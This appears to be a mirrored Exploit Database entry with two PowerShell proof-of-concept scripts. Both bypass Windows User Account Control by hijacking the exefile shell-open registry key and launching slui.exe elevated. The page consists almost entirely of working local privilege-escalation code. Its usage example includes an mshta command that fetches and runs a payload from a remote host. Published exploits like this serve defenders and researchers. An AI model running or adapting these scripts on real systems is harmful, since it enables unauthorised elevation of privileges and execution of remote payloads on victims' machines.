Microsoft Windows – UAC Protection Bypass (Via Slui File Handler Hijack) (PowerShell)

• Exploit Database
• 113 阅读

• 作者： Gushmazuko
  日期： 2019-06-17
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/46998/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84

  Interactive Version:   <# .SYNOPSIS This script is a proof of concept to bypass the User Access Control (UAC) via SluiFileHandlerHijackLPE .NOTES Function : SluiHijackBypass File Name: SluiHijackBypass.ps1 Author : Gushmazuko .LINK https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass.ps1 Original source: https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation .EXAMPLE Load "cmd.exe" (By Default used &apos;arch 64&apos;): SluiHijackBypass -command "cmd.exe" -arch 64   Load "mshta http://192.168.0.30:4444/0HUGN" SluiHijackBypass -command "mshta http://192.168.0.30:4444/0HUGN" #>   function SluiHijackBypass(){ Param (   [Parameter(Mandatory=$True)] [String]$command, [ValidateSet(64,86)] [int]$arch = 64 )   #Create registry structure New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $command -Force   #Perform the bypass switch($arch) { 64 { #x64 shell in Windows x64 | x86 shell in Windows x86 Start-Process "C:\Windows\System32\slui.exe" -Verb runas } 86 { #x86 shell in Windows x64 C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process C:\Windows\System32\slui.exe -Verb runas" } }   #Remove registry structure Start-Sleep 3 Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -Force }     ################################################################################     Non-Interactive Version:   <# .SYNOPSIS Noninteractive version of script, for directly execute. This script is a proof of concept to bypass the User Access Control (UAC) via SluiFileHandlerHijackLPE .NOTES File Name: SluiHijackBypass_direct.ps1 Author : Gushmazuko .LINK https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass_direct.ps1 Original source: https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation .EXAMPLE Load "cmd.exe" (By Default used &apos;arch 64&apos;): powershell -exec bypass .\SluiHijackBypass_direct.ps1 #>   $program = "cmd.exe" New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $program -Force #For x64 shell in Windows x64: Start-Process "C:\Windows\System32\slui.exe" -Verb runas #For x86 shell in Windows x64: #C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process "C:\Windows\System32\slui.exe" -Verb runas" Start-Sleep 3 Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -Force